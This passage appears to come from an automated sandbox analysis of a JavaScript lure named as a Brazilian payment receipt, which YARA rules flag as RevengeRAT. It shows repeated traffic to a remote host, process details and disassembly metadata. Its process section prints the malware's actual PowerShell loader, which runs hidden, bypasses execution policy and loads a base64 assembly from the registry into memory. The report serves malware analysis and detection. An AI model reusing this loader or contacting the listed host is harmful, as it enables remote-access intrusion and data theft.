                                  Dec 19, 2024 16:42:17.150271893 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:17.156689882 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:17.277621031 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:17.588486910 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:17.589925051 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:17.709687948 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:17.709770918 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:17.830095053 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:32.168153048 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:32.170531988 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:32.290380001 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:32.606432915 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:32.608499050 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:32.728193998 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:32.728277922 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:32.848037004 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:37.253665924 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:37.373641014 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:47.178426027 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:47.180571079 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:47.300549984 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:47.604844093 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:47.606214046 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:47.726068020 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:42:47.726252079 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:42:47.845817089 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:02.200062990 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:02.202353954 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:02.322484016 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:02.629441977 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:02.631380081 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:02.751528978 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:02.751844883 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:02.872131109 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:07.252902031 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:07.373034954 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:17.218842983 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:17.224149942 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:17.344572067 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:17.648454905 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:17.650149107 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:17.770350933 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:17.770545006 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:17.890979052 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:32.238832951 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:32.240516901 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:32.360510111 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:32.664875984 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:32.667660952 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:32.787492037 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:32.789910078 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:32.909531116 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:37.257972956 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:37.377954960 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:47.263384104 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:47.269270897 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:47.389233112 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:47.693115950 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:47.695574999 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:47.816297054 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:47.816502094 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:47.936373949 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:51.502758026 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:51.624613047 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:55.674602985 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:55.794239998 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:43:55.862047911 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:43:55.981976986 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:02.287950039 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:02.289738894 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:44:02.409796000 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:02.804652929 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:02.813679934 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:44:02.934144974 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:02.934402943 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:44:03.054610968 CET3334973038.51.135.44192.168.2.4
                                  Dec 19, 2024 16:44:11.610121965 CET49730333192.168.2.438.51.135.44
                                  Dec 19, 2024 16:44:11.730099916 CET3334973038.51.135.44192.168.2.4

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:10:41:58
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js"
                                  Imagebase:0x7ff6e4420000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:10:42:00
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_RevengeRAT, Description: RevengeRAT and variants payload, Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000001.00000002.2959069281.00000176818A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:2
                                  Start time:10:42:00
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:6.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:12
                                    Total number of Limit Nodes:1
                                    execution_graph 15218 7ffd9b8b94c5 15219 7ffd9b8b94cb GetVolumeInformationA 15218->15219 15221 7ffd9b8b9696 15219->15221 15209 7ffd9b8bff19 15210 7ffd9b8bff2b 15209->15210 15212 7ffd9b8bfed9 15209->15212 15214 7ffd9b8b47a0 15210->15214 15215 7ffd9b8b47a9 GetFileType 15214->15215 15217 7ffd9b8bff69 15215->15217 15222 7ffd9b8bffff 15223 7ffd9b8c0007 CreateFileW 15222->15223 15225 7ffd9b8c00fe 15223->15225

                                    Executed Functions

                                    Function 00007FFD9B8B8D18 Relevance: 5.2, Strings: 3, Instructions: 1445COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ffd9b8b8d18-7ffd9b8bede0 5 7ffd9b8bedec-7ffd9b8bee23 0->5 6 7ffd9b8bede2-7ffd9b8bede7 call 7ffd9b8b8d78 0->6 9 7ffd9b8bee29-7ffd9b8bee34 5->9 10 7ffd9b8bf014-7ffd9b8bf029 5->10 6->5 11 7ffd9b8bee36-7ffd9b8bee3e 9->11 12 7ffd9b8beea2-7ffd9b8beea7 9->12 22 7ffd9b8bf02b-7ffd9b8bf032 10->22 23 7ffd9b8bf033-7ffd9b8bf07e 10->23 11->10 16 7ffd9b8bee44-7ffd9b8bee59 11->16 13 7ffd9b8beea9-7ffd9b8beeb5 12->13 14 7ffd9b8bef13-7ffd9b8bef1d 12->14 13->10 21 7ffd9b8beebb-7ffd9b8beece 13->21 19 7ffd9b8bef3f-7ffd9b8bef47 14->19 20 7ffd9b8bef1f 14->20 17 7ffd9b8bee5b-7ffd9b8bee80 16->17 18 7ffd9b8bee82-7ffd9b8bee8d 16->18 17->18 28 7ffd9b8beed0-7ffd9b8beed3 17->28 18->10 25 7ffd9b8bee93-7ffd9b8beea0 18->25 26 7ffd9b8bef4a-7ffd9b8bef55 19->26 29 7ffd9b8bef24-7ffd9b8bef2c call 7ffd9b8b8d98 20->29 21->26 22->23 41 7ffd9b8bf09b-7ffd9b8bf0ac 23->41 42 7ffd9b8bf080-7ffd9b8bf086 23->42 25->11 25->12 26->10 30 7ffd9b8bef5b-7ffd9b8bef76 26->30 34 7ffd9b8beed5 28->34 35 7ffd9b8beedf-7ffd9b8beee7 28->35 36 7ffd9b8bef31-7ffd9b8bef3d 29->36 30->10 33 7ffd9b8bef7c-7ffd9b8bef8f 30->33 33->10 37 7ffd9b8bef95-7ffd9b8befa6 33->37 34->35 35->10 38 7ffd9b8beeed-7ffd9b8bef12 35->38 36->19 37->10 48 7ffd9b8befa8-7ffd9b8befb7 37->48 46 7ffd9b8bf0ae-7ffd9b8bf0b9 41->46 47 7ffd9b8bf0bd-7ffd9b8bf0e0 41->47 44 7ffd9b8bf088-7ffd9b8bf099 42->44 45 7ffd9b8bf0e1-7ffd9b8bf15a 42->45 44->41 44->42 63 7ffd9b8bf15c-7ffd9b8bf16c 45->63 64 7ffd9b8bf16e-7ffd9b8bf1c1 45->64 46->47 50 7ffd9b8befb9-7ffd9b8befc4 48->50 51 7ffd9b8bf002-7ffd9b8bf013 48->51 50->51 56 7ffd9b8befc6-7ffd9b8beffd call 7ffd9b8b8d98 50->56 56->51 63->63 63->64 70 7ffd9b8bf217-7ffd9b8bf21e 64->70 71 7ffd9b8bf1c3-7ffd9b8bf1c9 64->71 73 7ffd9b8bf220-7ffd9b8bf221 70->73 74 7ffd9b8bf25f-7ffd9b8bf270 70->74 71->70 72 7ffd9b8bf1cb-7ffd9b8bf1cc 71->72 75 7ffd9b8bf1cf-7ffd9b8bf1d2 72->75 76 7ffd9b8bf224-7ffd9b8bf227 73->76 87 7ffd9b8bf277-7ffd9b8bf288 74->87 78 7ffd9b8bf1d8-7ffd9b8bf1e8 75->78 79 7ffd9b8bf289-7ffd9b8bf2b9 75->79 76->79 80 7ffd9b8bf229-7ffd9b8bf23a 76->80 83 7ffd9b8bf1ea-7ffd9b8bf20c 78->83 84 7ffd9b8bf210-7ffd9b8bf215 78->84 89 7ffd9b8bf2bb-7ffd9b8bf345 79->89 90 7ffd9b8bf269-7ffd9b8bf270 79->90 81 7ffd9b8bf256-7ffd9b8bf25d 80->81 82 7ffd9b8bf23c-7ffd9b8bf242 80->82 81->74 81->76 82->79 86 7ffd9b8bf244-7ffd9b8bf252 82->86 83->84 84->70 84->75 86->81 97 7ffd9b8bf348-7ffd9b8bf352 89->97 98 7ffd9b8bf347 89->98 90->87 99 7ffd9b8bf35b-7ffd9b8bf35f 97->99 100 7ffd9b8bf354-7ffd9b8bf359 97->100 98->97 101 7ffd9b8bf362-7ffd9b8bf3c5 99->101 100->101 107 7ffd9b8bf3c8-7ffd9b8bf43f call 7ffd9b8b47f0 101->107 108 7ffd9b8bf3c7 101->108 117 7ffd9b8bf442-7ffd9b8bf44c 107->117 118 7ffd9b8bf441 107->118 108->107 119 7ffd9b8bf455-7ffd9b8bf459 117->119 120 7ffd9b8bf44e-7ffd9b8bf453 117->120 118->117 121 7ffd9b8bf45c-7ffd9b8bf49a 119->121 120->121 125 7ffd9b8bf49c 121->125 126 7ffd9b8bf49d-7ffd9b8bf4a7 121->126 125->126 127 7ffd9b8bf4a9-7ffd9b8bf4ae 126->127 128 7ffd9b8bf4b0-7ffd9b8bf4b4 126->128 129 7ffd9b8bf4b7-7ffd9b8bf523 127->129 128->129 136 7ffd9b8bf526-7ffd9b8bf55d 129->136 137 7ffd9b8bf525 129->137 141 7ffd9b8bf560-7ffd9b8bf578 136->141 142 7ffd9b8bf55f 136->142 137->136 144 7ffd9b8bf57b-7ffd9b8bf585 141->144 145 7ffd9b8bf57a 141->145 142->141 146 7ffd9b8bf588-7ffd9b8bf591 144->146 147 7ffd9b8bf586-7ffd9b8bf587 144->147 145->144 149 7ffd9b8bf5ed-7ffd9b8bf5f3 146->149 150 7ffd9b8bf593-7ffd9b8bf59c 146->150 147->146 151 7ffd9b8bf5f5-7ffd9b8bf5fb 149->151 152 7ffd9b8bf59f-7ffd9b8bf5a6 150->152 153 7ffd9b8bf59e 150->153 154 7ffd9b8bf5fe-7ffd9b8bf603 151->154 155 7ffd9b8bf5fd 151->155 161 7ffd9b8bf5e8-7ffd9b8bf5eb 152->161 162 7ffd9b8bf5a8 152->162 153->152 156 7ffd9b8bf690-7ffd9b8bf6b4 154->156 157 7ffd9b8bf604-7ffd9b8bf614 154->157 155->154 167 7ffd9b8bf6b7-7ffd9b8bf6b8 156->167 168 7ffd9b8bf6b6-7ffd9b8bf6b8 156->168 164 7ffd9b8bf616-7ffd9b8bf642 157->164 165 7ffd9b8bf644-7ffd9b8bf67a call 7ffd9b8ba4d0 157->165 161->149 162->157 166 7ffd9b8bf5aa-7ffd9b8bf5b1 162->166 164->165 165->156 171 7ffd9b8bf5b8-7ffd9b8bf5d4 166->171 170 7ffd9b8bf6b9-7ffd9b8bf6bc 167->170 168->170 173 7ffd9b8bf776-7ffd9b8bf794 170->173 174 7ffd9b8bf6c2-7ffd9b8bf76f call 7ffd9b8ba480 170->174 182 7ffd9b8bf5d6-7ffd9b8bf5d8 171->182 183 7ffd9b8bf5da-7ffd9b8bf5e7 171->183 186 7ffd9b8bf797-7ffd9b8bf79f 173->186 187 7ffd9b8bf796-7ffd9b8bf79f 173->187 174->173 182->151 183->161 190 7ffd9b8bf7a4-7ffd9b8bf7b6 186->190 187->190 194 7ffd9b8bf8a7-7ffd9b8bf8b5 call 7ffd9b8bf94c 190->194 195 7ffd9b8bf7bc-7ffd9b8bf7ca 190->195 203 7ffd9b8bf8c8-7ffd9b8bf919 call 7ffd9b8b2ed8 194->203 204 7ffd9b8bf8b7-7ffd9b8bf8c5 194->204 200 7ffd9b8bf7d0-7ffd9b8bf858 call 7ffd9b8ba498 195->200 201 7ffd9b8bf85f-7ffd9b8bf8a6 195->201 200->201 201->194 204->203
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -V_L$5K_H$d
                                    • API String ID: 0-1475000724
                                    • Opcode ID: 147e281bd4afd81baff9e9d8729cbdef12a3ad2bf59f40ac0ad6add7694c8e02
                                    • Instruction ID: 9cadba806c6aebd9faa92b54e50321987eec7db013f91836c1bd08d6c3aa1170
                                    • Opcode Fuzzy Hash: 147e281bd4afd81baff9e9d8729cbdef12a3ad2bf59f40ac0ad6add7694c8e02
                                    • Instruction Fuzzy Hash: E8A24871F0EA8A4FE76DDB3884659B577E1EF59300B0541BED05EC71B7DE28A8428B80
                                    Function 00007FFD9B8C4001 Relevance: .4, Instructions: 398COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 988 7ffd9b8c4001-7ffd9b8c4067 991 7ffd9b8c4069-7ffd9b8c4072 988->991 992 7ffd9b8c40d3 988->992 991->992 994 7ffd9b8c4074-7ffd9b8c4080 991->994 993 7ffd9b8c40d5-7ffd9b8c40fa 992->993 1000 7ffd9b8c4166 993->1000 1001 7ffd9b8c40fc-7ffd9b8c4105 993->1001 995 7ffd9b8c40b9-7ffd9b8c40d1 994->995 996 7ffd9b8c4082-7ffd9b8c4094 994->996 995->993 998 7ffd9b8c4098-7ffd9b8c40ab 996->998 999 7ffd9b8c4096 996->999 998->998 1002 7ffd9b8c40ad-7ffd9b8c40b5 998->1002 999->998 1004 7ffd9b8c4168-7ffd9b8c4210 1000->1004 1001->1000 1003 7ffd9b8c4107-7ffd9b8c4113 1001->1003 1002->995 1005 7ffd9b8c4115-7ffd9b8c4127 1003->1005 1006 7ffd9b8c414c-7ffd9b8c4164 1003->1006 1015 7ffd9b8c427e 1004->1015 1016 7ffd9b8c4212-7ffd9b8c421c 1004->1016 1007 7ffd9b8c412b-7ffd9b8c413e 1005->1007 1008 7ffd9b8c4129 1005->1008 1006->1004 1007->1007 1011 7ffd9b8c4140-7ffd9b8c4148 1007->1011 1008->1007 1011->1006 1018 7ffd9b8c4280-7ffd9b8c42a9 1015->1018 1016->1015 1017 7ffd9b8c421e-7ffd9b8c422b 1016->1017 1019 7ffd9b8c422d-7ffd9b8c423f 1017->1019 1020 7ffd9b8c4264-7ffd9b8c427c 1017->1020 1024 7ffd9b8c42ab-7ffd9b8c42b6 1018->1024 1025 7ffd9b8c4313 1018->1025 1022 7ffd9b8c4243-7ffd9b8c4256 1019->1022 1023 7ffd9b8c4241 1019->1023 1020->1018 1022->1022 1026 7ffd9b8c4258-7ffd9b8c4260 1022->1026 1023->1022 1024->1025 1027 7ffd9b8c42b8-7ffd9b8c42c6 1024->1027 1028 7ffd9b8c4315-7ffd9b8c43a6 1025->1028 1026->1020 1029 7ffd9b8c42c8-7ffd9b8c42da 1027->1029 1030 7ffd9b8c42ff-7ffd9b8c4311 1027->1030 1036 7ffd9b8c43ac-7ffd9b8c43bb 1028->1036 1031 7ffd9b8c42dc 1029->1031 1032 7ffd9b8c42de-7ffd9b8c42f1 1029->1032 1030->1028 1031->1032 1032->1032 1034 7ffd9b8c42f3-7ffd9b8c42fb 1032->1034 1034->1030 1037 7ffd9b8c43bd 1036->1037 1038 7ffd9b8c43c3-7ffd9b8c4421 call 7ffd9b8c4444 1036->1038 1037->1038
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 06334fca3ffbf649be1295d75a291eef967fc294c308f7497fefdb9380f5c6f5
                                    • Instruction ID: d949ec324ff4b6eda6a021a05c2e83eff63402126f2b852e3a579e9128005f52
                                    • Opcode Fuzzy Hash: 06334fca3ffbf649be1295d75a291eef967fc294c308f7497fefdb9380f5c6f5
                                    • Instruction Fuzzy Hash: A5D18270A18A4E8FEBA8EF28C8557F977D1FB58310F14426ED84DC7295DF3499848B81
                                    Function 00007FFD9B8C4DB1 Relevance: .4, Instructions: 381COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 939a53b085306ff772deb0b9e23240f7c3acd799d276131481451f4782634e9e
                                    • Instruction ID: 839128c46e2572569a0a8603c18350b6ef154ebdb71601a93bf33c4622830866
                                    • Opcode Fuzzy Hash: 939a53b085306ff772deb0b9e23240f7c3acd799d276131481451f4782634e9e
                                    • Instruction Fuzzy Hash: A6D18270A18A4D8FEBA8EF28C8657F977D1FB58310F55826ED80DC7295CF7499808B81
                                    Function 00007FFD9B8B94C5 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 373 7ffd9b8b94c5-7ffd9b8b94c9 374 7ffd9b8b94cb 373->374 375 7ffd9b8b94cd 373->375 374->375 376 7ffd9b8b94ce-7ffd9b8b9694 GetVolumeInformationA 374->376 375->376 383 7ffd9b8b9696 376->383 384 7ffd9b8b969c-7ffd9b8b9731 call 7ffd9b8b9732 376->384 383->384
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID:
                                    • API String ID: 2039140958-0
                                    • Opcode ID: c1e2cf34d8b2e7c9b595c739cbd229de3d0e4cd002b4ecdc905802b976a30f45
                                    • Instruction ID: aeb5cd1577f4ad905b5c19d452fc4187253e47897bf7e65e33ca4fdd86b26281
                                    • Opcode Fuzzy Hash: c1e2cf34d8b2e7c9b595c739cbd229de3d0e4cd002b4ecdc905802b976a30f45
                                    • Instruction Fuzzy Hash: 24817330A18A5C8FDB98DF58D855BE9BBF1FF99300F1081AAD04DD3295CA34A985CF81
                                    Function 00007FFD9B8B46F2 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 3f68956717f024374b7e7df7f3eee17fe26f3cd209c19a208ca942e2a5557349
                                    • Instruction ID: 38f53109bc01afc8c24add0c0640bae0474dfc9764fe79e8210c4deb7f994d3e
                                    • Opcode Fuzzy Hash: 3f68956717f024374b7e7df7f3eee17fe26f3cd209c19a208ca942e2a5557349
                                    • Instruction Fuzzy Hash: 7F517072A0FA9C4FEB19976C98562B97FE0EF56320F0442BFD099C71E3D9556806C780
                                    Function 00007FFD9B8BFFFF Relevance: 1.6, APIs: 1, Instructions: 149fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 425 7ffd9b8bffff-7ffd9b8c0093 431 7ffd9b8c0095-7ffd9b8c009a 425->431 432 7ffd9b8c009d-7ffd9b8c00fc CreateFileW 425->432 431->432 433 7ffd9b8c00fe 432->433 434 7ffd9b8c0104-7ffd9b8c012c 432->434 433->434
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 87e5e688b990ffd5d9da5e3826339286535a8773c2c8cf4f3f17fc9daab604de
                                    • Instruction ID: 6d7a5cd72f8487371a630a972ed386ceb11e9e4362b9a0411c5c1fbbc691e24b
                                    • Opcode Fuzzy Hash: 87e5e688b990ffd5d9da5e3826339286535a8773c2c8cf4f3f17fc9daab604de
                                    • Instruction Fuzzy Hash: 4741B131A1CA5C8FDB58EF58D845AF9BBE0FF69721F04426FE049D3252DB34A8058B81
                                    Function 00007FFD9B8B47A0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 493 7ffd9b8b47a0-7ffd9b9077b2 GetFileType 498 7ffd9b9077ba-7ffd9b9077df 493->498 499 7ffd9b9077b4 493->499 499->498
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 713d7d7928db1f3580a9e0ac501b3b9310b8f53a3e2ebebc14327bf16e0ae0a9
                                    • Instruction ID: 8bccffd5f1c5e9283f39b4f163200a39c6b7952c1b70726885c47d42eb420786
                                    • Opcode Fuzzy Hash: 713d7d7928db1f3580a9e0ac501b3b9310b8f53a3e2ebebc14327bf16e0ae0a9
                                    • Instruction Fuzzy Hash: 4521D771A0CA0C9FDB58DBA8C8097B97BE1FB59320F10416FD049D3291DB756806CB91
                                    Function 00007FFD9B9816BD Relevance: .6, Instructions: 554COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
